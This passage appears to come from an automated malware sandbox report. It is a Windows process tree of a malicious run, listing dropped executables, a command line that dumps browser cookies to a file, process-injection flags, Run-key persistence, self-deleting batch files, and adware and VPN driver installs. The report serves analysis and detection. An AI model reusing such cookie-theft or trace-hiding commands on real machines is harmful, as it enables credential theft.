                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:6160
                                                                                                                                                                                                                                                                                • C:\ProgramData\3112974.exe
                                                                                                                                                                                                                                                                                  "C:\ProgramData\3112974.exe"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                  PID:5300
                                                                                                                                                                                                                                                                                  • C:\ProgramData\3112974.exe
                                                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:7256
                                                                                                                                                                                                                                                                                  • C:\ProgramData\5810235.exe
                                                                                                                                                                                                                                                                                    "C:\ProgramData\5810235.exe"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  PID:5176
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:6904
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:6608
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                            PID:3340
                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                              PID:4228
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:4668
                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            PID:4780
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:4584
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:4644
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:5812
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:4452
                                                                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            PID:5472
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding D0347E0609CD0655356F21D016DE38F4 C
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:5172
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 89AD88A6F86D9028E873F56E6C84F029
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:6640
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8580
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:8440
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ffccfe19ec0,0x7ffccfe19ed0,0x7ffccfe19ee0
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:3544
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff63ef14e60,0x7ff63ef14e70,0x7ff63ef14e80
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                PID:6964
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4804
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:3708
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:4584
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3044 /prefetch:2
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:5304
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=1904 /prefetch:8
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:7848
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=3052 /prefetch:8
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:2028
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=3124 /prefetch:8
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:9052
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=1044 /prefetch:8
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:6660
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,1870391855652108981,5150420088416321516,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8440_1238265116" --mojo-platform-channel-handle=2676 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE5C75.bat" "
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:4572
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:4208
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                  PID:7480
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                  PID:7124
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                  PID:9036
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE5C75.bat"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                  PID:4656
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE5C75.bat" "
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:4812
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:7664
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE5C55.bat" "
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:6592
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:7844
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                          PID:7948
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                          PID:8220
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE5C55.bat"
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                          PID:8132
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE5C55.bat" "
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:8736
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        PID:4376
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:4992
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                        PID:6472
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:7704
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        PID:8136
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:8208
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:8704
                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                          PID:8992
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5f7185fa-e93d-1f4b-adce-760298aa512c}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                            PID:9128
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000160"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                            PID:7548
                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:7856
                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
